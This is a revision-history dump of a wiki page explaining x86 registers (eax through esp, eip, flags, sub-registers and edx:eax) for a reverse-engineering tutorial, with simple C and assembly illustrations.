<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
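<br />
The values in these tables can be reproduced with masks and shifts. The following is a minimal C sketch; the helper names are invented for illustration, and a plain 32-bit integer stands in for the register:<br />

```c
#include <stdint.h>

/* ax: the low 16 bits of eax */
static uint16_t low16(uint32_t eax) { return (uint16_t)(eax & 0xFFFFu); }

/* ah: bits 8 to 15 of eax (the high byte of ax) */
static uint8_t high8(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xFFu); }

/* al: the low 8 bits of eax */
static uint8_t low8(uint32_t eax) { return (uint8_t)(eax & 0xFFu); }

/* Writing al replaces only the lowest 8 bits and leaves the rest of eax alone. */
static uint32_t set_low8(uint32_t eax, uint8_t al)
{
    return (eax & 0xFFFFFF00u) | al;
}
```

With eax set to 0x12345678, low16 gives 0x5678, high8 gives 0x56 and low8 gives 0x78, matching the first table; set_low8(0x12345678, 0xFF) gives 0x123456FF.<br />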
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, with edx as the high half and eax as the low half, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
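<br />
In C terms, the concatenation is a shift and an OR. The sketch below uses made-up helper names; mul_model is only a model of how an unsigned 32-bit multiplication splits its 64-bit result between the two registers:<br />

```c
#include <stdint.h>

/* Build the 64-bit value edx:eax, with edx as the high half. */
static uint64_t combine(uint32_t edx, uint32_t eax)
{
    return ((uint64_t)edx << 32) | eax;
}

/* Hypothetical model of an unsigned 32-bit multiply: the 64-bit
 * product is split into edx (high half) and eax (low half). */
static void mul_model(uint32_t a, uint32_t b, uint32_t *edx, uint32_t *eax)
{
    uint64_t product = (uint64_t)a * b;
    *edx = (uint32_t)(product >> 32);
    *eax = (uint32_t)product;
}
```

combine(0x11223344, 0xaabbccdd) gives 0x11223344aabbccdd, as in the table above.<br />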
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3159Registers2012-01-16T03:25:04Z<p>Killboy: /* General Purpose Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across function calls, and others remain unchanged. This is a convention of the compiler and must be upheld by the code itself: registers are not preserved automatically (although in some assembly languages they are -- but not in x86). In other words, when a function is called, there is no guarantee that volatile registers will retain their values when the function returns, and it is the called function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture.<br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions that use the "__fastcall" convention receive their first two parameters in ecx and edx. Additionally, when a member function of a class is called, a pointer to the object (the ''this'' pointer) is often passed in ecx, regardless of the calling convention. <br />
<br />
ecx is also often used as a loop counter. ''for'' loops generally, although not always, keep their counter variable in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it until it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, and variables on the stack are instead referenced relative to the stack pointer, which moves throughout the function (this gets confusing -- luckily, IDA automatically detects and corrects for a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the top is actually at a lower virtual address than the bottom as the stack grows downwards in memory towards the heap). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register that stores the address of the instruction being executed. Making a relative jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning, and together the bits store meta-information about the results of previous operations: for example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register usually concerns the ''cmp'' and ''test'' instructions, which commonly set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may control program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is the lower half of one of the 32-bit registers, so changing the 16-bit register also changes the 32-bit register. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, with edx as the high half and eax as the low half, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3158Registers2012-01-16T03:22:54Z<p>Killboy: /* esp */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across function calls, and others remain unchanged. This is a convention of the compiler and must be upheld by the code itself: registers are not preserved automatically (although in some assembly languages they are -- but not in x86). In other words, when a function is called, there is no guarantee that volatile registers will retain their values when the function returns, and it is the called function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions that use the "__fastcall" convention receive their first two parameters in ecx and edx. Additionally, when a member function of a class is called, a pointer to the object (the ''this'' pointer) is often passed in ecx, regardless of the calling convention. <br />
<br />
ecx is also often used as a loop counter. ''for'' loops generally, although not always, keep their counter variable in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it until it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, and variables on the stack are instead referenced relative to the stack pointer, which moves throughout the function (this gets confusing -- luckily, IDA automatically detects and corrects for a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the top is actually at a lower virtual address than the bottom as the stack grows downwards in memory towards the heap). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register that stores the address of the instruction being executed. Making a relative jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning; together they store meta-information about the results of previous operations, for example whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register usually centers on the ''cmp'' and ''test'' instructions, which set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may be controlling program flow or a loop.<br />
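<br />
To make that a bit more concrete, here is a minimal C sketch of how ''cmp'' decides the three flags mentioned above. It assumes ''cmp a, b'' is modeled as the subtraction a - b with the result thrown away; the struct and function names are invented for this example and are not part of any real API.<br />

```c
#include <stdint.h>

/* Illustrative model of three bits of the flags register. */
struct cmp_flags {
    int zf; /* zero flag: the operands were equal */
    int cf; /* carry flag: unsigned a was below unsigned b (a borrow) */
    int of; /* overflow flag: the signed subtraction overflowed */
};

/* Hypothetical model of "cmp a, b": compute a - b, keep only the flags. */
struct cmp_flags cmp32(uint32_t a, uint32_t b)
{
    uint32_t result = a - b;
    struct cmp_flags f;
    f.zf = (result == 0);
    f.cf = (a < b);
    /* Signed overflow: a and b differ in sign, and the result's sign
     * differs from a's sign. */
    f.of = (int)(((a ^ b) & (a ^ result)) >> 31);
    return f;
}
```

A conditional jump such as ''jz'' then only needs to look at zf, which is why a ''cmp'' followed by a jump is such a common pair.<br />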
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit register also changes the 32-bit register. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
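<br />
The same relationships can be written as bit masks and shifts. The C sketch below is only an illustration (the helper names are invented here), but it reproduces the values in the two tables above and shows that writing to al changes eax as well.<br />

```c
#include <stdint.h>

/* ax is the low 16 bits of eax. */
uint16_t get_ax(uint32_t eax) { return (uint16_t)(eax & 0xFFFFu); }

/* ah is the high byte of ax, i.e. bits 8 to 15 of eax. */
uint8_t get_ah(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xFFu); }

/* al is the low byte of ax, i.e. bits 0 to 7 of eax. */
uint8_t get_al(uint32_t eax) { return (uint8_t)(eax & 0xFFu); }

/* Writing al replaces only the lowest byte; the other 24 bits of eax
 * keep their old value. */
uint32_t set_al(uint32_t eax, uint8_t al)
{
    return (eax & 0xFFFFFF00u) | al;
}
```

With eax set to 0x12345678, get_ax gives 0x5678, get_ah gives 0x56 and get_al gives 0x78; calling set_al with 0xFF turns eax into 0x123456FF.<br />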
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
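<br />
In C terms, edx:eax behaves like a 64-bit integer whose upper half is edx and whose lower half is eax. The sketch below uses invented helper names: the first joins the two halves, and the second splits the result of an unsigned 32-bit multiplication into the two halves, which is how the multiply instruction reports a product that is too big for one register.<br />

```c
#include <stdint.h>

/* Join edx (upper 32 bits) and eax (lower 32 bits) into one 64-bit value. */
uint64_t join_edx_eax(uint32_t edx, uint32_t eax)
{
    return ((uint64_t)edx << 32) | eax;
}

/* Hypothetical model of an unsigned 32-bit multiply: the full 64-bit
 * product is split across edx (high half) and eax (low half). */
void mul32(uint32_t a, uint32_t b, uint32_t *edx, uint32_t *eax)
{
    uint64_t product = (uint64_t)a * b;
    *edx = (uint32_t)(product >> 32);
    *eax = (uint32_t)product;
}
```

For instance, join_edx_eax(0x11223344, 0xaabbccdd) gives 0x11223344aabbccdd, matching the table above.<br />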
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3157Registers2012-01-16T03:18:48Z<p>Killboy: /* Special Purpose Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. Registers are where most math is done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are, but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
